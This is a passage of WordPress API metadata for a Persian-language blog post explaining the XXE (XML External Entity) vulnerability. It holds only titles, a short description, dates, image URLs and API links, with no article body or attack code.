\u0644\u06cc\u0627\u0646\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/xxe-cover.jpg\",\"datePublished\":\"2021-05-19T13:31:26+00:00\",\"dateModified\":\"2022-02-05T12:01:43+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/56ec88338ff7cb5202779a216d9f3399\"},\"description\":\"XXE 
\u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#breadcrumb\"},\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fa-IR\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#primaryimage\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/xxe-cover.jpg\",\"contentUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/xxe-cover.jpg\",\"width\":800,\"height\":500,\"caption\":\"\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u062e\u0627\u0646\u0647\",\"item\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\",\"name\":\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 
\u0644\u06cc\u0627\u0646\",\"description\":\"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fa-IR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/56ec88338ff7cb5202779a216d9f3399\",\"name\":\"\u0627\u062f\u0645\u06cc\u0646\",\"description\":\"\u0639\u0644\u0627\u0642\u0645\u0646\u062f \u0628\u0647 \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0648 \u0622\u0634\u0646\u0627 \u0628\u0647 \u062d\u0648\u0632\u0647 \u062a\u0633\u062a \u0646\u0641\u0648\u0630\",\"sameAs\":[\"http:\\\/\\\/liangroup.net\",\"#\",\"https:\\\/\\\/x.com\\\/#\"],\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. 
-->","yoast_head_json":{"title":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","og_locale":"fa_IR","og_type":"article","og_title":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f","og_description":"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE 
\u0647\u0633\u062a\u0646\u062f.","og_url":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","og_site_name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","article_author":"#","article_published_time":"2021-05-19T13:31:26+00:00","article_modified_time":"2022-02-05T12:01:43+00:00","og_image":[{"width":800,"height":500,"url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","type":"image\/jpeg"}],"author":"\u0627\u062f\u0645\u06cc\u0646","twitter_card":"summary_large_image","twitter_creator":"@#","twitter_site":"@liansecurity","twitter_misc":{"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a":"\u0627\u062f\u0645\u06cc\u0646","\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646":"29 \u062f\u0642\u06cc\u0642\u0647"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#article","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/"},"author":{"name":"\u0627\u062f\u0645\u06cc\u0646","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/56ec88338ff7cb5202779a216d9f3399"},"headline":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f","datePublished":"2021-05-19T13:31:26+00:00","dateModified":"2022-02-05T12:01:43+00:00","mainEntityOfPage":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/"},"wordCount":959,"commentCount":0,"image":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","articleSection":["\u062a\u0633\u062a \u0646\u0641\u0648\u0630 \u0648 \u0627\u0645\u0646\u06cc\u062a","\u0645\u0642\u0627\u0644\u0627\u062a \u062a\u0633\u062a 
\u0646\u0641\u0648\u0630","\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f"],"inLanguage":"fa-IR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/liangroup.net\/blog\/what-is-xxe\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","url":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","name":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#primaryimage"},"image":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","datePublished":"2021-05-19T13:31:26+00:00","dateModified":"2022-02-05T12:01:43+00:00","author":{"@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/56ec88338ff7cb5202779a216d9f3399"},"description":"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE 
\u0647\u0633\u062a\u0646\u062f.","breadcrumb":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#breadcrumb"},"inLanguage":"fa-IR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/liangroup.net\/blog\/what-is-xxe\/"]}]},{"@type":"ImageObject","inLanguage":"fa-IR","@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#primaryimage","url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","contentUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","width":800,"height":500,"caption":"\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE"},{"@type":"BreadcrumbList","@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u062e\u0627\u0646\u0647","item":"https:\/\/liangroup.net\/blog\/"},{"@type":"ListItem","position":2,"name":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f"}]},{"@type":"WebSite","@id":"https:\/\/liangroup.net\/blog\/#website","url":"https:\/\/liangroup.net\/blog\/","name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a 
\u0633\u0627\u06cc\u0628\u0631\u06cc","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/liangroup.net\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fa-IR"},{"@type":"Person","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/56ec88338ff7cb5202779a216d9f3399","name":"\u0627\u062f\u0645\u06cc\u0646","description":"\u0639\u0644\u0627\u0642\u0645\u0646\u062f \u0628\u0647 \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0648 \u0622\u0634\u0646\u0627 \u0628\u0647 \u062d\u0648\u0632\u0647 \u062a\u0633\u062a \u0646\u0641\u0648\u0630","sameAs":["http:\/\/liangroup.net","#","https:\/\/x.com\/#"],"url":"https:\/\/liangroup.net\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/11057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/comments?post=11057"}],"version-history":[{"count":0,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/11057\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media\/11093"}],"wp:attachment":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media?parent=11057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/categories?post=11057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/tags?post=11057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":tr
ue}]}}